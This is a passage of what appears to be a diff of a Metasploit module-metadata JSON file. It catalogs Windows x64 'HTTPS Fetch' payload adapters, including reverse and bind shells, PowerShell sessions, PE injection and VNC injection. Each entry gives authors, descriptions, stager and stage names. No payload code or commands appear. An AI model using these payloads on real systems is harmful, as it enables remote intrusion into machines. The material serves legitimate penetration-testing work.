"disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS 
server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/https/x64/peinject/reverse_tcp_rc4": { - "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": 
"windows/x64/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/https/x64/peinject/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/https/x64/pingback_reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/https/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/powershell_bind_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/windows/https/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/powershell_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/windows/https/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": 
"Fetch and execute an x64 payload from an HTTPS server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/powershell_reverse_tcp_ssl": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/windows/https/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/https/x64/shell/bind_ipv6_tcp": { - "name": "HTTPS 
Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/https/x64/shell/bind_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/https/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/https/x64/shell/bind_tcp": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/https/x64/shell/bind_tcp_rc4": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/https/x64/shell/bind_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/https/x64/shell/reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped 
command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/https/x64/shell/reverse_tcp_rc4": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", - 
"staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/https/x64/shell/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/https/x64/shell_bind_tcp": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/https/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": 
null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/shell_reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/https/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/vncinject/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 
connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/https/x64/vncinject/bind_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/https/x64/vncinject/bind_tcp": { - "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a 
connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/https/x64/vncinject/bind_tcp_rc4": { - "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/https/x64/vncinject/bind_tcp_uuid": { - "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_http": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel 
communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_https": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
